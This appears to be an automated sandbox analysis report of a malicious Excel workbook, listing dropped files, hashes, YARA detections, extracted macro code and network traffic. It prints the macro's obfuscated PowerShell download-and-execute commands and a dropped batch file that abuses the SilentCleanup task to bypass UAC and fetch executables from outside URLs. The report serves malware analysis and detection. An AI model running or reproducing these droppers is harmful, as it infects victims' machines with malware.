                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C46FS22UMOIQN8SC5D58.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DFLQU3YDWIS0DDTFQO4S.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OY5PTG0JO5WWBCHCBZ8W.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UF448UGC9HH8NS13TMAN.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y0IWL9PP10MD7U9YNNWP.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\gUuYfpYBjYgU.exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4384256
                                                                          Entropy (8bit):7.956312284494714
                                                                          Encrypted:false
                                                                          SSDEEP:98304:9vvfdTU6hTADDLfMOQYRm+VsvX428sUeIEPOSJGe39/3XN:9vXhUYADDLfzQYI9vo2LUtVS0eN/XN
                                                                          MD5:E79F542FB3F5AA6E4400953BE24780DB
                                                                          SHA1:41EE7EE8C663793B354513439E9743A5BFC6A246
                                                                          SHA-256:2DDD796E9B53AB3D7EAF4093529077F637F182A934A851AF24DA8C8F189AEED3
                                                                          SHA-512:5A3D723E2DE4C4978B76C79C44F305C7CAA247D55EF29AB4B9BE8846D2EFA6335DA1BAEE69048909FB8603C1C875F6A59846D95F8F9A80294CD8B71D0790105B
                                                                          Malicious:false
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.._..............0...B...........B.. ....C...@.. .......................@C...........@...................................B.O.....C.0.................... C...................................................... ............... ..H............text.....B.. ....B................. ..`.rsrc...0.....C.......B.............@..@.reloc....... C.......B.............@..B..................B.....H....... ...TO......M...t.....?..........................................0................(....(....o....(....r...p(.....r...p .'...r...ps......%......s....s......o..... ....(.....r9..p .'...r...ps......%......s....s........o..... ....(.....rM..p .'...r...ps........%......s....s........o..... ....(.....*".(.....*...0.............+..*..0..s........( ......s!...}......(.......{....s....}......{.....{.....{....s&...}......{.....{.....{.....{.....{....s....}....*..0...........( .
                                                                          C:\Users\user\AppData\Roaming\sp.exe
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4384256
                                                                          Entropy (8bit):7.956312284494714
                                                                          Encrypted:false
                                                                          SSDEEP:98304:9vvfdTU6hTADDLfMOQYRm+VsvX428sUeIEPOSJGe39/3XN:9vXhUYADDLfzQYI9vo2LUtVS0eN/XN
                                                                          MD5:E79F542FB3F5AA6E4400953BE24780DB
                                                                          SHA1:41EE7EE8C663793B354513439E9743A5BFC6A246
                                                                          SHA-256:2DDD796E9B53AB3D7EAF4093529077F637F182A934A851AF24DA8C8F189AEED3
                                                                          SHA-512:5A3D723E2DE4C4978B76C79C44F305C7CAA247D55EF29AB4B9BE8846D2EFA6335DA1BAEE69048909FB8603C1C875F6A59846D95F8F9A80294CD8B71D0790105B
                                                                          Malicious:true
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.._..............0...B...........B.. ....C...@.. .......................@C...........@...................................B.O.....C.0.................... C...................................................... ............... ..H............text.....B.. ....B................. ..`.rsrc...0.....C.......B.............@..@.reloc....... C.......B.............@..B..................B.....H....... ...TO......M...t.....?..........................................0................(....(....o....(....r...p(.....r...p .'...r...ps......%......s....s......o..... ....(.....r9..p .'...r...ps......%......s....s........o..... ....(.....rM..p .'...r...ps........%......s....s........o..... ....(.....*".(.....*...0.............+..*..0..s........( ......s!...}......(.......{....s....}......{.....{.....{....s&...}......{.....{.....{.....{.....{....s....}....*..0...........( .
                                                                          C:\Users\user\Desktop\CCDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Category:dropped
                                                                          Size (bytes):266808
                                                                          Entropy (8bit):7.550002100209944
                                                                          Encrypted:false
                                                                          SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2NdwIv9DQokMufSR1f8f3BsgaINVQTB9GccQaE:YFDQxtfSHfmBgWOT3Va4n
                                                                          MD5:336756F5355F20218CC54EE0452E76D6
                                                                          SHA1:A238C602DAD4E5ACAA519DE6D2F7843850EEC0B8
                                                                          SHA-256:3ED958EC85F5D1AD326B3599EDC1B1CDEB4CA3C74CF2E4B5A71600ACB66D38B9
                                                                          SHA-512:342AE87DFFB6C902CCF3F35894BD0BC9F66E4DCAEDAEA55D60FCAB25067FCEB9A787B3F9CED66B9F7B6DACC16745914E6F44E4A48B341B115D270EB1B2B9BCC0
                                                                          Malicious:false
                                                                          Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                                          C:\Users\user\Documents\pd.bat
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):2342
                                                                          Entropy (8bit):5.4591667854724255
                                                                          Encrypted:false
                                                                          SSDEEP:48:dnjA3U3jbo/7vUU3jbo/7vQU3jbo/7vWhN:dnM3U3w/QU3w/kU3w/o
                                                                          MD5:B4D7DD4D44FB5B5C2A155D7AEC0EC1C3
                                                                          SHA1:C8E993C57AA8D7A873E36F1A60361D96ECEBD7E4
                                                                          SHA-256:FEBAEFB0E0405A1E6633C8D7D7C09C08EFDA0D2752E3B0EEE9E69FD12E41C9BF
                                                                          SHA-512:C06E7EC11224607AF7E2E4FD21580FE410CAE1D653E5272EEBDE8713BBCD49AABF38A0F460489471B6EA4B5771BD426B4676739619BA228B6DFFC8DE901F9247
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                                          • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                                          Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.ba

                                                                          Static File Info

                                                                          General

                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                                          Entropy (8bit):7.7433326027127505
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                          File name:spetsifikatsiya.xls
                                                                          File size:234496
                                                                          MD5:2e0819723d50d0b6a2e6ffdb33778e40
                                                                          SHA1:329d002fc53f93e92b99dfbc5937412b40fccf93
                                                                          SHA256:04ee61f1184be78db3fd78821306e0b81e6dfaff17f6019d76e69237d6133b6a
                                                                          SHA512:4077093de364439b83c65a62b866021a61ac050834c74691ff5b19b125be3fef703f2e30bdc380d04f8ff32811c4e6c9ca84b444be08f7c940326a0243910048
                                                                          SSDEEP:6144:cnSGiysRchNXHfA1MiWhZFVEld+Dr7rIHtjQA7MOfSRFvkf3ysQaoNVwTpNGc8iy:BNjQaNfS3veyQ2eTXrSB
                                                                          File Content Preview:........................;......................................................................................................................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:e4eea286a4b4bcb4

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OLE
                                                                          Number of OLE Files:1

                                                                          OLE File "spetsifikatsiya.xls"

                                                                          Indicators

                                                                          Has Summary Info:True
                                                                          Application Name:unknown
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True

                                                                          Summary

                                                                          Code Page:1252
                                                                          Last Saved By:blobijump
                                                                          Create Time:2020-09-20 21:17:44
                                                                          Last Saved Time:2021-01-03 23:14:32
                                                                          Security:1

                                                                          Document Summary

                                                                          Document Code Page:1252
                                                                          Thumbnail Scaling Desired:False
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:1048576

                                                                          Streams

                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:276
                                                                          Entropy:3.16930549839
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:156
                                                                          Entropy:3.29938329109
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 230144
                                                                          General
                                                                          Stream Path:Workbook
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Stream Size:230144
                                                                          Entropy:7.77909229259
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                          Macro 4.0 Code

                                                                          ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/jjfIQ8u','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 6, 2021 09:57:47.798036098 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:47.838144064 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:47.838244915 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:47.857510090 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:47.897645950 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900795937 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900847912 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900882959 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900932074 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:47.916851997 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:47.956836939 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:47.957597017 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:48.156300068 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:49.621814013 CET49167443192.168.2.22172.67.8.238
                                                                          Jan 6, 2021 09:57:49.661902905 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:49.784332037 CET44349167172.67.8.238192.168.2.22
                                                                          Jan 6, 2021 09:57:49.784360886 CET44349167172.67.8.238192.168.2.22
